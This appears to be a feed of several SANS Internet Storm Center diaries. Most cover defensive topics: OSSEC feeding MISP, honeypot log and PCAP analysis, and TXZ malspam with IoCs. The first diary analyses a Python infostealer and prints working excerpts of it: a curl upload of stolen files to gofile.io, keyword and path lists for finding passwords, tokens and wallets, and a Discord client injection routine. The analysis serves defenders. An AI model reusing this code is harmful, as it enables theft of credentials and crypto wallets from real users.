Reading view

There are new articles available, click to refresh the page.

"K1w1" InfoStealer Uses gofile.io for Exfiltration, (Fri, May 31st)

Python remains a nice language for attackers and I keep finding interesting scripts that are usually not very well detected by antivirus solutions. The one I found has a VT score of 7/65! (SHA256:a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c[1]). I decided to call it "k1w1" infostealer because this string is referenced in many variable and function names. The script has classic infostealer capabilities to find interesting pieces of data on the victim's computer but has some interesting techniques. 

First, it uses gofile.io to exfiltrate data:

try:gofileserver = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
except:gofileserver = "store4"

gofile.io is a popular online storage management[2]. Collected data are uploaded:

def UP104D7060F113(path):
    try:
        r = subprocess.Popen(f"curl -F \"file=@{path}\" https://{gofileserver}.gofile.io/uploadFile", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()
        return loads(r[0].decode('utf-8'))["data"]["downloadPage"]
    except: return False

gofile.io provides guest access with sufficient capabilities to upload files and keep them available for a few days. Once uploaded a download link is returned in JSON data. All links are shared on a Discord channel.

Besides the classic information, this infostealer also searches for "keywords" in the victim's files from common directories:

def K1W1():
    user = temp.split("\AppData")[0]
    path2search = [
        user    + "/Desktop",
        user    + "/Downloads",
        user    + "/Documents",
        roaming + "/Microsoft/Windows/Recent",
    ]

    key_wordsFiles = [
        "passw",
        "mdp",
        "motdepasse",
        "mot_de_passe",
        "login",
        "secret",
        "bot",
        "atomic",
        "account",
        "acount",
        "paypal",
        "banque",
        "bot",
        "metamask",
        "wallet",
        "crypto",
        "exodus",
        "discord",
        "2fa",
        "code",
        "memo",
        "compte",
        "token",
        "backup",
        "secret",
        "seed",
        "mnemonic"
        "memoric",
        "private",
        "key",
        "passphrase",
        "pass",
        "phrase",
        "steal",
        "bank",
        "info",
        "casino",
        "prv",
        "privé",
        "prive",
        "telegram",
        "identifiant",
        "personnel",
        "trading"
        "bitcoin",
        "sauvegarde",
        "funds",
        "récupé",
        "recup",
        "note",
    ]

    wikith = []
    for patt in path2search: 
        kiwi = threading.Thread(target=K1W1F113, args=[patt, key_wordsFiles])
        kiwi.start()
        wikith.append(kiwi)
    return wikith

You can see many French keywords. We can assume that the script targets French-speaking victims.

Classic applications are targeted:

   br0W53rP47H5 = [    
        [f"{roaming}/Opera Software/Opera GX Stable",               "opera.exe",        "/Local Storage/leveldb",           "/",             "/Network",             "/Local Extension Settings/"                      ],
        [f"{roaming}/Opera Software/Opera Stable",                  "opera.exe",        "/Local Storage/leveldb",           "/",             "/Network",             "/Local Extension Settings/"                      ],
        [f"{roaming}/Opera Software/Opera Neon/User Data/Default",  "opera.exe",        "/Local Storage/leveldb",           "/",             "/Network",             "/Local Extension Settings/"                      ],
        [f"{local}/Google/Chrome/User Data",                        "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome SxS/User Data",                    "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Beta/User Data",                   "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Dev/User Data",                    "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Unstable/User Data",               "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Google/Chrome Canary/User Data",                 "chrome.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/BraveSoftware/Brave-Browser/User Data",          "brave.exe",        "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Vivaldi/User Data",                              "vivaldi.exe",      "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/Default/Local Extension Settings/"              ],
        [f"{local}/Yandex/YandexBrowser/User Data",                 "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserCanary/User Data",           "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserDeveloper/User Data",        "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserBeta/User Data",             "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserTech/User Data",             "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Yandex/YandexBrowserSxS/User Data",              "yandex.exe",       "/Default/Local Storage/leveldb",   "/Default/",     "/Default/Network",     "/HougaBouga/"                                    ],
        [f"{local}/Microsoft/Edge/User Data",                       "edge.exe",         "/Default/Local Storage/leveldb",   "/Default",      "/Default/Network",     "/Default/Local Extension Settings/"              ]
    ]
    d15C0rDP47H5 = [
        [f"{roaming}/discord",          "/Local Storage/leveldb"],
        [f"{roaming}/Lightcord",        "/Local Storage/leveldb"],
        [f"{roaming}/discordcanary",    "/Local Storage/leveldb"],
        [f"{roaming}/discordptb",       "/Local Storage/leveldb"],
    ]

    p47H570Z1P = [
        [f"{roaming}/atomic/Local Storage/leveldb",                             "Atomic Wallet.exe",        "Wallet"        ],
        [f"{roaming}/Guarda/Local Storage/leveldb",                             "Guarda.exe",               "Wallet"        ],
        [f"{roaming}/Zcash",                                                    "Zcash.exe",                "Wallet"        ],
        [f"{roaming}/Armory",                                                   "Armory.exe",               "Wallet"        ],
        [f"{roaming}/bytecoin",                                                 "bytecoin.exe",             "Wallet"        ],
        [f"{roaming}/Exodus/exodus.wallet",                                     "Exodus.exe",               "Wallet"        ],
        [f"{roaming}/Binance/Local Storage/leveldb",                            "Binance.exe",              "Wallet"        ],
        [f"{roaming}/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb",     "Jaxx.exe",                 "Wallet"        ],
        [f"{roaming}/Electrum/wallets",                                         "Electrum.exe",             "Wallet"        ],
        [f"{roaming}/Coinomi/Coinomi/wallets",                                  "Coinomi.exe",              "Wallet"        ],
        ["C:\Program Files (x86)\Steam\config",                                 "steam.exe",                "Steam"         ],
        [f"{local}/Riot Games/Riot Client/Data",                                "RiotClientServices.exe",   "RiotClient"    ],
    ]
    t3136r4M = [f"{roaming}/Telegram Desktop/tdata", 'Telegram.exe', "Telegram"]

If found also some injection in Discord files:

def inj3c710n():

    username = os.getlogin()

    folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']

    for folder_name in folder_list:
        deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
        if os.path.isdir(deneme_path):
            for subdir, dirs, files in os.walk(deneme_path):
                if 'app-' in subdir:
                    for dir in dirs:
                        if 'modules' in dir:
                            module_path = os.path.join(subdir, dir)
                            for subsubdir, subdirs, subfiles in os.walk(module_path):
                                if 'discord_desktop_core-' in subsubdir:
                                    for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
                                        if 'discord_desktop_core' in subsubsubdir:
                                            for file in subsubfiles:
                                                if file == 'index.js':
                                                    file_path = os.path.join(subsubsubdir, file)
                                                    injeCTmED0cT0r_cont = requests.get(inj3c710n_url).text
                                                    injeCTmED0cT0r_cont = injeCTmED0cT0r_cont.replace("%WEBHOOK%", h00k)
                                                    with open(file_path, "w", encoding="utf-8") as index_file:
                                                        index_file.write(injeCTmED0cT0r_cont)

The script has also classic evasion techniques based on VM, IP address, and suspicious processes detection. Many wallets are also targeted:

w411375 = [
    ["nkbihfbeogaeaoehlefnkodbefgpgknn", "Metamask"         ],
    ["ejbalbakoplchlghecdalmeeeajnimhm", "Metamask"         ],
    ["fhbohimaelbohpjbbldcngcnapndodjp", "Binance"          ],
    ["hnfanknocfeofbddgcijnmhnfnkdnaad", "Coinbase"         ],
    ["fnjhmkhhmkbjkkabndcnnogagogbneec", "Ronin"            ],
    ["egjidjbpglichdcondbcbdnbeeppgdph", "Trust"            ],
    ["ojggmchlghnjlapmfbnjholfjkiidbch", "Venom"            ],
    ["opcgpfmipidbgpenhmajoajpbobppdil", "Sui"              ],
    ["efbglgofoippbgcjepnhiblaibcnclgk", "Martian"          ],
    ["ibnejdfjmmkpcnlpebklmnkoeoihofec", "Tron"             ],
    ["ejjladinnckdgjemekebdpeokbikhfci", "Petra"            ],
    ["phkbamefinggmakgklpkljjmgibohnba", "Pontem"           ],
    ["ebfidpplhabeedpnhjnobghokpiioolj", "Fewcha"           ],
    ["afbcbjpbpfadlkmhmclhkeeodmamcflc", "Math"             ],
    ["aeachknmefphepccionboohckonoeemg", "Coin98"           ],
    ["bhghoamapcdpbohphigoooaddinpkbai", "Authenticator"    ],
    ["aholpfdialjgjfhomihkjbmgjidlcdno", "ExodusWeb3"       ],
    ["bfnaelmomeimhlpmgjnjophhpkkoljpa", "Phantom"          ],
    ["agoakfejjabomempkjlepdflaleeobhb", "Core"             ],
    ["mfgccjchihfkkindfppnaooecgfneiii", "Tokenpocket"      ],
    ["lgmpcpglpngdoalbgeoldeajfclnhafa", "Safepal"          ],
    ["bhhhlbepdkbapadjdnnojkbgioiodbic", "Solfare"          ],
    ["jblndlipeogpafnldhgmapagcccfchpi", "Kaikas"           ],
    ["kncchdigobghenbbaddojjnnaogfppfj", "iWallet"          ],
    ["ffnbelfdoeiohenkjibnmadjiehjhajb", "Yoroi"            ],
    ["hpglfhgfnhbgpjdenjgmdgoeiappafln", "Guarda"           ],
    ["cjelfplplebdjjenllpjcblmjkfcffne", "Jaxx Liberty"     ],
    ["amkmjjmmflddogmhpjloimipbofnfjih", "Wombat"           ],
    ["fhilaheimglignddkjgofkcbgekhenbh", "Oxygen"           ],
    ["nlbmnnijcnlegkjjpcfjclmcfggfefdm", "MEWCX"            ],
    ["nanjmdknhkinifnkgdcggcfnhdaammmj", "Guild"            ],
    ["nkddgncdjgjfcddamfgcmfnlhccnimig", "Saturn"           ], 
    ["aiifbnbfobpmeekipheeijimdpnlpgpp", "TerraStation"     ],
    ["fnnegphlobjdpkhecapkijjdkgcjhkib", "HarmonyOutdated"  ],
    ["cgeeodpfagjceefieflmdfphplkenlfk", "Ever"             ],
    ["pdadjkfkgcafgbceimcpbkalnfnepbnk", "KardiaChain"      ],
    ["mgffkfbidihjpoaomajlbgchddlicgpn", "PaliWallet"       ],
    ["aodkkagnadcbobfpggfnjeongemjbjca", "BoltX"            ],
    ["kpfopkelmapcoipemfendmdcghnegimn", "Liquality"        ],
    ["hmeobnfnfcmdkdcmlblgagmfpfboieaf", "XDEFI"            ],
    ["lpfcbjknijpeeillifnkikgncikgfhdo", "Nami"             ],
    ["dngmlblcodfobpdpecaadgfbcggfjfnm", "MaiarDEFI"        ],
    ["ookjlbkiijinhpmnjffcofjonbfbgaoc", "TempleTezos"      ],
    ["eigblbgjknlfbajkfhopmcojidlgcehm", "XMR.PT"           ],
]

[1] https://www.virustotal.com/gui/file/a6230d4d00a9d8ecaf5133b02d9b61fe78283ac4826a8346b72b4482d9aab54c
[2] https://gofile.io/welcome

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Feeding MISP with OSSEC, (Thu, May 30th)

I'm a big fan of OSSEC[1] for years. OSSEC ("Open Source Security Event Correlator") is a comprehensive, open-source host-based intrusion detection system (HIDS). It is designed to monitor and analyze system logs, detect suspicious activities, and provide real-time alerts for security incidents. OSSEC can perform log analysis, file integrity monitoring, rootkit detection, and active response to mitigate threats. It supports various platforms including Linux, Windows, and macOS, and can be integrated with various security tools and SIEM solutions. I already wrote some diaries about it in the past[2]. I'm running my instance on all my servers, I made some contributions to the project. 

One of the features I like most is "Active-Response". It allows us to automatically take predefined actions in response to detected security events or threats. When a specific rule is triggered, OSSEC can execute scripts or commands to mitigate the threat, such as blocking an IP address, disabling a user account, or restarting a service. This feature enhances the system's security by providing real-time, automated reactions to potential intrusions or malicious activities, reducing the window of opportunity for attackers to exploit vulnerabilities.

Being a big fan of MISP[3], making them talk together to improve our detection capabilities is a great improvement. Most of my OSSEC agents are installed on many servers facing the Internet and get scanned/visited/flooded by thousands of malicious requests. The default Active-Response enabled in OSSEC is to temporarily block offending addresses to slow down attackers (for example, brute-force attacks). These addresses are also interesting for multiple reasons:

1. If one host is attacked, the same IP address could be blocked on all servers

2. The IP address could be shared with peers (it's an interesting IOC - Indicator of Compromise))

3. We can track if the same IP address is coming back regularly

I wrote an Active-Response script that, if conditions are met, will submit offending IP addresses to a MISP instance. How does it work?

First, you need to configure a new Active-Response config:

<active-response>
  <disabled>no</disabled>
  <command>ossec2misp</command>
  <location>server</location>
  <rules_id>100213,100201,31509</rules_id>
</active-response>

The most important parameter is the list of rules that will trigger the active response. By example, my rule 31509 detects Wordpress login brute-force attacks:

<!-- WordPress wp-login.php brute force -->
  <rule id="31509" level="3">
    <if_sid>31108</if_sid>
    <url>wp-login.php|/administrator</url>
    <regex>] "POST \S+wp-login.php| "POST /administrator</regex>
    <description>CMS (WordPress or Joomla) login attempt.</description>
</rule>

When the alert triggers, the OSSEC server will execute the command called "ossec2misp":

<command>
  <name>ossec2misp</name>
  <executable>ossec2misp.py</executable>
  <expect>srcip</expect>
  <timeout_allowed>no</timeout_allowed>
</command>

The command will call my Python script located in your Active-Response scripts repository (usually $OSSEC_HOME/active-response/bin/). The script can be configured, most options are self-explaining:

misp_url          = "https://misp.domain.tld"
misp_key          = "<redacted>"
misp_verifycert   = True
misp_info         = "OSSEC ActiveResponse"      # Event title
misp_last         = "30d"                       # Max period to search for IP address
misp_new_event    = False                       # Force the creation of a new event for every report
misp_distribution = 0                           # The distribution setting used for the newly created event, if relevant. [0-3]
misp_analysis     = 1                           # The analysis level of the newly created event, if applicable. [0-2]
misp_threat       = 3                           # The threat level ID of the newly created event, if applicable. [1-4]
misp_tags         = [ "source:OSSEC" ]          # Tags for the newly created event, if applicable
misp_publish      = True                        # Automatically puslish the event
syslog_server     = "192.168.1.1"               # If defined, enable syslog logging
redis_server      = "redis"                     # Redis server hostname/ip
redis_port        = 6379                        # Redis server port
redis_db          = 0                           # Redis server db

The Redis server is used to prevent the MISP server from being flooded by API requests. Once an IP has been detected, it is stored in Redis for 1h.

When an offending IP address is already present in MISP, the script will add a "sighting" to it. The purpose of "sighting" is to provide feedback on the usage and relevance of the IP address within the platform. This helps in verifying the prevalence and impact of the IOC, enhances collaborative threat intelligence by validating data, and assists in prioritizing IP addresses based on their sightings frequency and relevance.

Here is an example of an OSSEC event:

My script is available in my Github repo[4]. Comments, improvements or ideas are welcome!

[1] https://ossec.net/
[2] https://isc.sans.edu/search.html?q=ossec&token=&Search=Search
[3] https://www.misp-project.org
[4] https://github.com/xme/ossec/blob/main/ossec2misp.py

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

&#xa;Is that It&#x3f; Finding the Unknown: Correlations Between Honeypot Logs & PCAPs [Guest Diary], (Tue, May 28th)

[This is a Guest Diary by Joshua Jobe, an ISC intern as part of the SANS.edu BACS program]

Introduction

Upon starting the Internship in January 2024, I wondered how I was going to tackle analyzing all the logs, how to parse and understand JSON files, and make sense of the plethora of details to even try to make an attack observation.  Where do the files go, how do we correlate the filenames with the hashes, what’s the deal with webhoneypot logs?  During the Introductory Call, Mentor Handler, Guy Bruneau, mentioned the DShield SIEM [1] he has been working on for everyone to use to enhance the internship experience.  I felt this was the perfect opportunity to build something that will assist with correlating the ‘attacks’ on the sensors by ingesting the logs into a SIEM.  This is especially useful for those that want to see the details in a way that is more organized and easier to extrapolate data.  However, simply reviewing activity in the SIEM may not always be enough to build a complete picture for an attack observation.  Likewise, simply parsing through the logs may not always give you a complete picture either.

This blog post will walk through the steps I have taken to build a bigger picture to make an attack observation, briefly going over various attacks such as malicious files, HTTP requests, Cowrie/Webhoneypot JSON logs and PCAPs.

Where to Start

After initially setting up the DShield Honeypot (sensor), it will inevitably take 2-3 weeks or more to begin seeing attacks, especially any that may involve uploading/downloading files.  Be patient.  Interesting IP addresses, files, URLs, TTY logs, etc. will show up.  It is imperative that you follow the instructions to properly expose your sensor or sensors to the internet.
 
For example, I am running two sensors behind an Asus RT-AC86U router, since this router doesn’t natively allow the same port entries when Port Forwarding two internal IP addresses, I opted to setup one sensor with only TCP ports 8000, 2222, 2223, 8443 open with the second sensor open to the entire port range: TCP/UDP 1:65535.  Utilizing the demilitarized zone (DMZ) is not currently an option due to how my network is setup.  The sensor with the entire port range open tends to see more traffic. 

Once you have your sensors up and running, I highly recommend setting up the DShield SIEM previously mentioned.  Here are some recommendations to consider for the SIEM:

  1. Physical system or VM – it is best to install this on a system you can leave running 24/7 and not use your primary laptop or PC. Using a dedicated system allows the SIEM to constantly ingest the files from the sensors with minimal delays in populating the details in Kibana.  Occasional restarts and updates are expected, but they will be less frequent than if you use your primary system.  I repurposed an old HP laptop with 8 GB of RAM specifically for this task and placed it next to the sensors.
  2. Hard Drive Space – Consider 300-500GB at minimum.  This is critical to hash out ahead of time.  The minimum recommended space for the Docker partition is 300GB, however, the more features you integrate (Arkime, Zeek, PCAP captures, etc), the quicker it will fill up.  I started with 100GB thinking it would be plenty.  I was wrong and within about a month and a half the SIEM wasn’t operating correctly due to not having enough space.  Deleting non-critical data worked for about a week.  I ended up adding a spare 1 TB external HDD, then expanded the volume group and logical volume to use the entire drive.
     

Now that the sensors are collecting data and the SIEM is ingesting the logs, you need to focus on what your first attack observation will be on.

SIEM Review and Correlation of File Uploads

After about 3 weeks, you should begin seeing quite a bit of interesting activity on the SIEM.  Here are a few examples of what you may see:

You have multiple options to focus your attention on.  If you narrow your results by IP, you may see the associated Username & Passwords, any commands that were attempted, or perhaps filenames.  If you filter by filename, you get the associated IP address or addresses along with all other data associated with just the filename.  When filtering by any filter other than IP to find associated IP addresses, I recommend choosing an IP or multiple IP addresses to populate additional data specific to that IP.  For example, if you want to find associated IP addresses for filename ‘sshd’, hover the cursor over the ‘Filename’ and select the + to add it as a filter near the top:

This filter results in the following IP addresses, Session Codes, and the associated SHA256 file hashes, among other information:

As you can see, filtering by ‘sshd’ identifies 4 IP addresses, associated sessions, and 2 different SHA256 hashes for the same filename.  This also narrows down only the logs related to this filter:

 

 

 

 

 

 

You can further narrow down the results by either IP address or focus on a single hash.  Let’s focus on a single IP address. Following the same example for filtering by filename, chose an IP address to filter on:

 This approach will narrow down the details specific to this IP address.  Select the X to remove the ‘sshd’ filter.  I recommend this  approach to see if this IP address is associated with other activities, such as web requests.

Filtering only a single IP, now reveals other Session details that you can further use to begin building an understanding of this threat actor. 

Using the single IP search also reveals related activity where 46 logs were recorded by the attempts of this threat actor: 

 

 

 

There are additional fields for this section of the SIEM, however, it is cut off for brevity.  Additional fields include destination port, source user command, username and password fields, along with HTTP request body for any web requests.

 

 

 

 

If you want to find the related details for all the associated IP addresses for the ‘sshd’ file, use the search field to create the expanded filter:

Other than what we’ve already covered, filtering using this search criteria will reveal all associated sessions and other interactions applicable to just those IP addresses.  In this example, there are 148 entries related to these IP addresses:

For the most part, observations that relate to files uploaded to a honeypot, the SIEM is about all I need.  Reviewing the cowrie JSON logs pulls everything with all relevant details for each IP address into a format I feel is a bit easier to follow.  Some data may not always populate on the SIEM, so it isn’t a bad idea to review the logs from the honeypot to confirm.

For Attack Observations related to malicious files, use VirusTotal to check the file hash and decide if it’s worth investigating further using other sandboxes such as Cuckoo Sandbox [2] or Joe Sandbox Cloud [3], among others.  Alternatively, using a virtual machine (VM) to perform various types of malware analysis may reveal details not reported on using automatic malware analysis.

HTTP Requests

One of the great things about using the SIEM is that you get a quick, upfront view of all the interactions happening on your sensor or sensors.  You could also parse through the logs manually to get similar data.  However, one thing that I just couldn’t wrap my head around is what is so special about these web requests?  Sure, we can Google the URLs, perhaps find CVEs or other sources related to a URL.  You might even be able to find vulnerable systems open on the internet.  For me, reviewing these requests on the SIEM or parsing through the logs still didn’t answer why.  Here is an example of web requests and user agents you might see on the SIEM to decide what you want to focus on:


Just like narrowing down results from potentially malicious files, we can do the same with the requests on the web interface of the SIEM to find the related IPs and other details.  Something I didn’t point out before is that the SIEM includes features to facilitate gathering information on a threat actor from CyberGordon, Censys, Shodan, or internally using Cont3xt: 

 

By narrowing down interesting files or web requests, you can use this section to visit the applicable websites for more information.  It is just an easier way of clicking and viewing details about that IP address.

 

 

 

Since the SIEM wasn’t cutting it for me with web requests, I turned to the logs from the sensors to manually parse.  However, as I will expand on in the last section, neither was really answering my question of what is making these requests so special.  But first, let’s turn to the logs.

Log Reviews from the DShield Sensor

Parsing the logs reveals a lot of details about an IP address or even web requests.  When I first started learning how to parse the JSON logs, I used both ChatGPT and an article from DigitalOcean called “How To Transform JSON Data with jq” [4].  Once you understand the structure of the JSON files, it is simple to parse the logs based on just about any search criteria.  To parse Telnet/SSH logs based on an IP address, you can use these commands:

There are a lot more details that can be pulled out, but you also must know what that log contains to know what the structure is.  Use the following command to parse the first object containing all the associated key-value pairs:

As an alternative to running the above commands, I decided to create a Python script to automate this approach to extract details I felt at the time to contain the details I wanted to focus on. [5]

I maintain two sensors, which automatically transfer copies of logged data to separate folders, daily. The script is in its own directory, so the file paths are relative to the script's location. Additionally, users have the flexibility to filter data either by IP address or Session ID. This is where the DShield SIEM proves invaluable. Users can first identify interesting data points, then further refine their search based on either IP address or Session ID:

For the sake of space, I only copied a portion of the results.  The output above also has data for all related sessions associated with that IP address.

When it comes to the webhoneypot logs, the process is similar, but the details will be different as the object and key-value pairs will be different.  Here is an example output of the webhoneypot logs:

The webhoneypot logs contain a lot of data.  Most, in my opinion, aren’t applicable to the details I would like to see.  Aside from manually parsing the files like the TELNET/SSH logs, I created a script specific to the format for these logs [5].  This gives a bit of flexibility for what you want to search for and whether you want to include any URLs that only begin with a forward slash “/”.  Depending on what you are searching for, the search could return hundreds of resulting logs.  For this reason, the script saves the results to a file, which also allows it to run faster.  Here is an example of running the script, then a partial output of the file:

The partial URL search is useful if you notice multiple URLs that contain a subdirectory in the path such as /jenkins/script and /jenkins/login.

While the web logs provide a lot of details, this goes back to what I mentioned earlier about something still seemed to be missing and answering the question of why these are being accessed.  This is where the PCAPs in the next section come into play.

Why You Should Use PCAPs

Having a honeypot running provides only so much insight into what a threat actor is doing just by reviewing the logs.  However, it wasn’t until I decided to focus an attack observation based upon the web requests that I realized something is missing.  If you haven’t decided to collect PCAPs up to this point, I highly recommend evaluating options to automatically collect them daily.  One option is using Daemonlogger by following the instructions provided by Mr. Bruneau’s DShield SIEM setup on Github [1] or finding a solution that works best for you.  

What you don’t get with the web logs from the honeypot is any inclination of what the threat actor may be doing – at least not from what I was able to observe.  For example, a path stood out to me that had over 500 requests to /cgi-bin/nas_sharing.cgi.  If you aren’t familiar with cgi-bin, it is often found on routers and other network devices such as NAS (network attached storage) devices from manufacturers such as Linksys, D-Link, Netgear, QNAP, Synology, etc.  A vulnerability in a path such as this is enticing to the actor as you will see in a moment.

After you have narrowed down an attack observation, found a URL path, and further reviewed the logs, you also narrowed down the dates to focus on.  Going back to how Daemonlogger is setup, it logs one PCAP file to a daily folder.  This makes it easy to go directly to the PCAP that will have the traffic of the URL to investigate further.  Taking the example of the /cgi-bin/nas_sharing.cgi, I reviewed PCAPs between 15-24 Apr 2024.  This is what I discovered that made these web requests even more interesting:

Remote Code Execution (RCE):

Parsing through the honeypot logs, I couldn’t find any correlation of that command.  The threat actor is using obfuscation to attempt to hide what they are doing by encoding the command into Base64.  Decoding the encoded string reveals the following:

With this information, you can build a rather thorough attack observation, having more data than simply a web request and researching the vulnerabilities associated with those file paths.
Here is one more HTTP request to highlight why you should capture network traffic on the sensor:

Without it, all you would find in the logs is that the HTTP request method is POST and URL is /device.rsp along with other associated data.

Final Thoughts

If you didn’t catch the details regarding data retention on the sensor at the start of the internship, the logs are deleted at certain intervals.  If you want to retain logs, set up an automatic way to transfer the logs to a separate system or a separate folder on the sensor.  My first or second attack observation included some logs that just so happen to be at the tail end of when they are deleted.  Fortunately, I had copies of the data, but I was relying on the details within the sensor.  When I went to parse the data again the next day, it was gone.  So, if you want long-term data retention for any of the logs, transfer the logs to another folder or system.  

I can’t reiterate it enough about the importance of capturing network traffic on the sensor.  The first month or so I hadn’t considered it.  After I started capturing the traffic, I rarely reviewed the PCAPs as most of the data I was looking at was encrypted traffic from the file uploads.  However, when it came to the web requests, this proved to be invaluable information.  

From observing the DShield SIEM to manually parsing the logs, find what works best for you and take time to review the data, extract interesting information, and develop the attack observation report over a few days.  

[1] https://github.com/bruneaug/DShield-SIEM
[2] https://malwr.ee/ 
[3] https://www.joesandbox.com/  
[4] https://www.digitalocean.com/community/tutorials/how-to-transform-json-data-with-jq 
[5] https://github.com/jrjobe/DShield-Cowrie-json-Parser 
[6] https://www.sans.edu/cyber-security-programs/bachelors-degree/

A few portions of this post were aided with the assistance of ChatGPT, most content is original - https://chatgpt.com/ 

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Files with TXZ extension used as malspam attachments, (Mon, May 27th)

Malicious e-mail attachments come in all shapes and sizes. In general, however, threat actors usually either send out files, which themselves carry a malicious payload – such as different scripts, Office documents or PDFs – or they send out “containers”, which include such files – e.g., image files or archives. These container files, especially, can sometimes be quite unusual… Which is where today’s diary comes in.

While going over messages that were caught in my malspam traps over the course of May, I found multiple e-mails that carried files with TXZ extension as their attachments. Since this extension is hardly the most common one, I needed quick help from Google to find that it was associated with Tar archives compressed with XZ utils[1]. It seems that even when it comes to malicious e-mail attachments, use of this extension is relatively unusual, since a quick check revealed that my malspam traps haven’t caught any such files in in 2021, only one file in 2022, and none in 2023.

As it turned out, however, both the 2022 file and the current files, that my malspam traps caught, were actually not TXZ files, but rather renamed RAR archives.

Although threat actors commonly modify extensions of malicious files they send out, I was a little mystified by the change in this case, given the aforementioned less-then-common use of TXZ files, and – presumably – their limited support by archiving utilities. Further Google searching, however, soon revealed the reason for it.

It turned out that TXZ (and RAR) files were among the filetypes for which Microsoft added native support to Windows 11 late last year[2]. Potential recipients of the malicious messages who used this operating system might therefore have been able to open the attachments simply using standard Windows file explorer, even if the extension and the file type were mismatched.

It is worth noting that that although multiple e-mails were caught in the traps, they all belonged to one of two campaigns.

Messages from the first campaign contained texts in Spanish and Slovak languages and were used to distribute a 464 kB PE file with GuLoader malware, which had 53/74 detections on Virus Total at the time of writing[3].

Messages from the second campaign contained texts in Croatian and Czech languages and were used to distribute a 4 kB batch file downloader for the FormBook malware, which – at the time of writing – had 31/62 detection rate on Virus Total[4].

Even though attachments with TXZ extension probably won't become the new “go to” for threat actors when it comes to malspam attachments, these examples show that they are in active use – at least in some regionally targeted campaigns. And although "blocklisting the bad" is hardly an ideal overall security approach, in this case, it might, perhaps, be worthwhile considering whether blocking or quarantining messages carrying these files (or blocking attachments with TXZ extension in mail agents) wouldn’t be a reasonable course of action, if these files aren’t commonly used in the context of a specific organization…

[1] https://fileinfo.com/extension/txz
[2] https://www.bleepingcomputer.com/news/microsoft/windows-11-adds-support-for-11-file-archives-including-7-zip-and-rar/
[3] https://www.virustotal.com/gui/file/3f060b4039fdb7286558f55295064ef44435d30ed83e3cd2884831e6b256f542
[4] https://www.virustotal.com/gui/file/1ab5f558baf5523e460946ec4c257a696acb785f7cc1da82ca49ffce2149deb6

IoCs
CW_00402902400429.bat
MD5: cade54a36c9cc490216057234b6e1c55
SHA-1: 31c0f43c35df873e73858be2a8e8762b1e195edd
SHA-256: 1ab5f558baf5523e460946ec4c257a696acb785f7cc1da82ca49ffce2149deb6

IMG_SMKGKZ757385839500358358935775939058735RepollPsyllid.exe
MD5: c7f827116e4b87862fc91d97fd1e01c7
SHA-1: d28d1b95adbe8cfbedceaf980403dd5921292eaf
SHA-256: 3f060b4039fdb7286558f55295064ef44435d30ed83e3cd2884831e6b256f542

-----------
Jan Kopriva
@jk0pr | LinkedIn
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA 4.5.1 Release, (Sun, May 26th)

YARA 4.5.0 was released with a small change to the regex syntax (allowing more whitespace) and many bugfixes.

Victor considers that although YARA-X (the rewrite of YARA in Rust) is still in beta, you can start to use it now.

From his blog post "YARA is dead, long live YARA-X":

YARA-X is still in beta, but is mature and stable enough for use, specially from the command-line interface or one-shot Python scripts. While the APIs may still undergo minor changes, the foundational aspects are already established.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

csvkit, (Sat, May 25th)

After reading my diary entry "Checking CSV Files", a reader informed me that CSV toolkit csvkit also contains a command to check CSV files: csvstat.py.

Here is this tool running on the same CSV file I used in my diary entry:

csvkit has a lot of dependencies, it took my quite some effort to install it on a machine without Internet connection. I had to download, transfer and install 50+ packages.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

